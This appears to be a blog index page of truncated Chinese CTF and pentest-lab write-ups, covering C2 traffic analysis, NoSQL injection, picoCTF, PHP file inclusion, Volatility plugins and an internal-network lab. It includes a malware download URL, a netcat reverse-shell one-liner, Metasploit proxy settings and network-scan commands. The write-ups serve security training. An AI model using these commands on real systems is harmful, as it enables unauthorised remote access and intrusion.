Bohemian

C2流量分析.1 EDR在一台机密计算机上检测到终止k4.exe进程的行为，取证人员取出来了该机器的镜像流量，请分析附件流量，回答对应问题。（注意：题目中的程序可能存在恶意操作，如果需要运行或调试，请在虚拟机中操作） https://pan.baidu.com/s/1ldNxI6mMfduIxjtAOSMcZQ 附件下载 提取码（GAME）备用下载 请提交Payload的完整下载地址。（答案示例：http://xxx.xxx.xxx/xxx） http://imgcache.cloudservicesdevc.tk/picturess/2023/RDSv38.dll C2流量分析.2 请提交Payload的SHA256哈希值。（字母大写，请根据流量内容作答） 右键将这个RDSv38.dll文件导出然后sha256即可 AA2CBD3103CECAF189F93D787C602679E156CC6FD90E22646D637F01C64222CF n6IcHjmQUNOd6TxOkV6WRigEPUZFkO2TIu8cS6MRyrE= Aj0S2EgsjOFd_JRsOjcBB_5- ...

复现地址：https://buuoj.cn/challenges#[GKCTF%202021]hackme 直接访问靶机是一个登录界面 给了提示：unicode , 注意server和其配置文件 右键查看源代码，可以看到一个注释，，这里是三个单词而不是四个，do you nosql？ 什么是 NosqlNoSQL 即 Not Only SQL，意即 “不仅仅是SQL”。在现代的计算系统上每天网络上都会产生庞大的数据量。这些数据有很大一部分是由关系数据库管理系统（RDBMS）来处理。 通过应用实践证明，关系模型是非常适合于客户服务器编程，远远超出预期的利益，今天它是结构化数据存储在网络和商务应用的主导技术。 NoSQL 是一项全新的数据库革命性运动，早期就有人提出，发展至 2009 年趋势越发高涨。NoSQL的拥护者们提倡运用非关系型的数据存储，相对于铺天盖地的关系型数据库运用，这一概念无疑是一种全新的思维的注入。 什么是 MongoDBMongoDB 是当前最流行的 NoSQL 数据库产品之一，由 C++ 语言编写，是一个基于分布式文件存储的数据库。旨在为 WEB 应用提供可 ...

webfindme访问页面，是一个登录的页面，账号密码test/test! 抓包看到跳转到一个页面， (/images/2023picoctf/image-20230327162639364.png) 访问这个/next-page/id=cGljb0NURntwcm94aWVzX2Fs 抓包，中间又会跳转一个页面，直接跳出来一个页面，看到有一个id，好像是base64，直接拼接 flag:picoCTF{proxies_all_the_way_a0fe074f} chronoHow to automate tasks to run at intervals on linux servers? 机翻：如何自动执行任务以在 Linux 服务器上定期运行？ 给了账号密码端口，直接连上去 定时任务的命令 crontab ，执行crontab -l 发现没有，crontab的文件目录在/etc/下 以cron开头， 在 challenge目录下也有flag flag:{“flag”: “picoCTF{Sch3DUL7NG_T45K3_L1NUX_1d781160}”, “us ...

web象棋王子顾名思义，应该是下象棋的，我们可以下，太菜了，js直接翻http://236f7cc1-466c-4d47-abf8-21b4ffc92cf7.node4.buuoj.cn:81/js/play.js在play.js中 下面有jsfuck 直接复制所有，到浏览器console中，即可

参考 12https://wiki.wgpsec.org/knowledge/ctf/Volatility.html#%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4https://blog.csdn.net/u011250160/article/details/120473177 volatility2常用模块 # 插件名称 功能 amcache 查看AmCache应用程序痕迹信息 apihooks 检测内核及进程的内存空间中的API hook atoms 列出会话及窗口站atom表 atomscan Atom表的池扫描(Pool scanner) auditpol 列出注册表HKLMSECURITYPolicyPolAdtEv的审计策略信息 bigpools 使用BigPagePoolScanner转储大分页池(big page pools) bioskbd 从实时模式内存中读取键盘缓冲数据(早期电脑可以读取出BIOS开机密码) cachedump 获取内存中缓存的域帐号的密码哈希 callbacks 打印全系统通 ...

webMyDoorhttp://43.142.108.3:28348/index.php?file=这里应该是文件读取，直接、etc/passwd 正常，index.php没有读取到，那伪协议获取源码PD9waHANCmVycm9yX3JlcG9ydGluZygwKTsNCg0KaWYgKGlzc2V0KCRfR0VUWydOX1MuUyddKSkgew0KICAgIGV2YWwoJF9HRVRbJ05fUy5TJ10pOw0KfQ0KDQppZighaXNzZXQoJF9HRVRbJ2ZpbGUnXSkpIHsNCiAgICBoZWFkZXIoJ0xvY2F0aW9uOi9pbmRleC5waHA/ZmlsZT0nKTsNCn0gZWxzZSB7DQogICAgJGZpbGUgPSAkX0dFVFsnZmlsZSddOw0KDQogICAgaWYgKCFwcmVnX21hdGNoKCcvXC5cLnxsYXxkYXRhfGlucHV0fGdsb2J8Z2xvYmFsfHZhcnxkaWN0fGdvcGhlcnxmaWxlfGh0dHB8cGhhcnxsb2NhbGhvc3R8XD98 ...

week1Classic Childhood Game简单js,我们右键源代码一下，翻一翻js文件直接搜hgame 没有，那肯定时编码或者加密了，找找可疑字符串，拿去解一下 12function mota() { var a = ['\x59\x55\x64\x6b\x61\x47\x4a\x58\x56\x6a\x64\x61\x62\x46\x5a\x31\x59\x6d\x35\x73\x53\x31\x6c\x59\x57\x6d\x68\x6a\x4d\x6b\x35\x35\x59\x56\x68\x43\x4d\x45\x70\x72\x57\x6a\x46\x69\x62\x54\x55\x31\x56\x46\x52\x43\x4d\x46\x6c\x56\x59\x7a\x42\x69\x56\x31\x59\x35']; webBecome A Member典型header头请求，cookie那个还挺难想的emmmm Referer: bunnybunnybunny.comX-Forwarded-For: 127.0.0. ...

https://www.iculture.cc/rce/ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.144.128 9990 >/tmp/f setg Proxies socks5:192.168.144.128:1080 #设置全局代理set ReverseAllowProxy true #这个参数是因为使用全局代理，可能会导致我们的shell无法反弹，所以需要开启。 setg Proxies socks5:192.168.144.136:8888 #设置全局代理set ReverseAllowProxy true #这个参数是因为使用全局代理，可能会导致我们的shell无法反弹，所以需要开启。 :>fscan.exe -h 192.168.48.1/24fscan.exe -h 192.168.48.1/24 / _ \ ___ ___ _ __ __ _ | | __ / /// __|/ | ‘/ ` |/ | |/ // /\___ \ (| | | (_ ...

环境相关漏洞技术：laravel、OVAS-PHP相关漏洞、隧道代理、免杀、提权、CVE-2021-3129、CVE-2021-3493等下载地址：百度云链接:https://pan.baidu.com/s/1p3GDd7V3Unmq3-wSAvl7_Q提取码: 1p9p 其中vulntarget-c是本次环境 github地址： https://github.com/crow821/vulntarget 拓扑图 vm网卡配置将百度网盘的靶场c下载下来，使用vm打开，我们先编辑一下虚拟网卡网段 这里要注意不勾选将主机虚拟连接到此网络，如果勾选的话，你会发现，我们直接能从主机ping到10，20段，这样就不是内网了。 第一台是ubuntu20 第二台win2016 第三台ubuntu16 设置好之后开机，但是还是有一点问题，默认作者配置的时候给到的是静态ip30段的，我们需要改一下，我这边net是144段的，所以我们给网卡一个144段的静态IP就可以了 账密1：vulntarget/root账密2：root/root#qwe 用root账号登录一下，改掉网卡配置 12345sur ...